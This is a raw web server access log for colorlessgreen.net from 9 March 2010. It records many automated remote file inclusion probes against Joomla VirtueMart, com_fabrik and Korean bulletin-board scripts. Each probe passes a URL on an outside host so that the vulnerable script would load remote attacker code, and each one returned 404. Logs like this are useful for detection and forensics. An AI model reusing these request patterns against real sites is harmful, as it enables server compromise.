87.106.132.3 - - [09/Mar/2010:08:33:34 -0800] "GET /logs/access_100226.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:08:34:54 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.163.171.205 - - [09/Mar/2010:08:35:32 -0800] "GET /blog/feed/ HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:08:37:49 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:08:37:49 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:08:37:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.129.166.154 - - [09/Mar/2010:08:45:31 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.129.166.154 - - [09/Mar/2010:08:45:31 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.129.166.154 - - [09/Mar/2010:08:45:31 -0800] "GET /logs/access_100226.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.129.166.154 - - [09/Mar/2010:08:46:06 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.129.166.154 - - [09/Mar/2010:08:46:06 -0800] "GET /logs/access_100226.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.129.166.154 - - [09/Mar/2010:08:46:06 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
76.13.114.106 - - [09/Mar/2010:08:48:44 -0800] "GET /blog/feed/ HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "colorlessgreen.net"
92.48.119.75 - - [09/Mar/2010:08:56:09 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
92.48.119.75 - - [09/Mar/2010:08:56:09 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
92.48.119.75 - - [09/Mar/2010:08:56:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:00:16 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:00:16 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:00:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
92.48.119.75 - - [09/Mar/2010:09:00:26 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
92.48.119.75 - - [09/Mar/2010:09:00:26 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
92.48.119.75 - - [09/Mar/2010:09:00:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:00:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:00:34 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:00:35 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
208.76.111.218 - - [09/Mar/2010:09:00:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
208.76.111.218 - - [09/Mar/2010:09:00:52 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
208.76.111.218 - - [09/Mar/2010:09:00:52 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
208.76.111.218 - - [09/Mar/2010:09:00:58 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
208.76.111.218 - - [09/Mar/2010:09:00:59 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
208.76.111.218 - - [09/Mar/2010:09:00:59 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
92.48.119.75 - - [09/Mar/2010:09:02:12 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
76.13.123.195 - - [09/Mar/2010:09:02:28 -0800] "GET /blog/feed/ HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:02:55 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:02:55 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:02:55 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:03:09 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:03:25 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
208.76.111.218 - - [09/Mar/2010:09:03:41 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
208.76.111.218 - - [09/Mar/2010:09:03:51 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.251.189.206 - - [09/Mar/2010:09:04:05 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.251.189.206 - - [09/Mar/2010:09:04:05 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.251.189.206 - - [09/Mar/2010:09:04:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:04:44 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.251.189.206 - - [09/Mar/2010:09:05:51 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.251.189.206 - - [09/Mar/2010:09:05:51 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.251.189.206 - - [09/Mar/2010:09:05:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
92.48.119.75 - - [09/Mar/2010:09:06:14 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.251.189.206 - - [09/Mar/2010:09:06:23 -0800] "GET /logs/access_100226.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:09:28 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
92.48.119.75 - - [09/Mar/2010:09:09:33 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:09:47 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:09:51 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.194 - - [09/Mar/2010:09:10:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.194 - - [09/Mar/2010:09:10:30 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.194 - - [09/Mar/2010:09:10:30 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:10:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:10:32 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:10:32 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:11:02 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.125.21.66 - - [09/Mar/2010:09:11:07 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.194 - - [09/Mar/2010:09:11:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.194 - - [09/Mar/2010:09:11:23 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.194 - - [09/Mar/2010:09:11:23 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.194 - - [09/Mar/2010:09:11:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.194 - - [09/Mar/2010:09:11:50 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.194 - - [09/Mar/2010:09:11:50 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
208.76.111.218 - - [09/Mar/2010:09:13:03 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
208.76.111.218 - - [09/Mar/2010:09:13:11 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:17:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:17:06 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:17:06 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.119.216.146 - - [09/Mar/2010:09:17:18 -0800] "GET /logs/access_100117.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.119.216.146 - - [09/Mar/2010:09:17:18 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
75.119.216.146 - - [09/Mar/2010:09:17:18 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
110.45.145.178 - - [09/Mar/2010:09:18:10 -0800] "GET ///bbs///delete_all.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:18:31 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:19:31 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:19:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:19:37 -0800] "GET /logs/access_100226.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:20:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:20:31 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:20:31 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:22:26 -0800] "GET //bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:22:28 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:22:28 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
210.116.103.118 - - [09/Mar/2010:09:23:31 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
210.116.103.118 - - [09/Mar/2010:09:23:31 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
210.116.103.118 - - [09/Mar/2010:09:23:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:25:34 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
110.45.145.178 - - [09/Mar/2010:09:25:41 -0800] "GET /logs/access_100226.log///bbs///delete_all.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "colorlessgreen.net"
110.45.145.178 - - [09/Mar/2010:09:25:41 -0800] "GET ///bbs///delete_all.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "colorlessgreen.net"
110.45.145.178 - - [09/Mar/2010:09:25:41 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:27:01 -0800] "GET //bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:27:01 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:27:04 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:27:45 -0800] "GET //bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:27:45 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
200.93.147.154 - - [09/Mar/2010:09:27:47 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:29:18 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:29:19 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:29:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:29:25 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:29:25 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:29:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:09:29:27 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:09:29:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:09:29:27 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:09:29:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:09:29:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:09:29:40 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:09:29:45 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:29:58 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:29:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:29:58 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
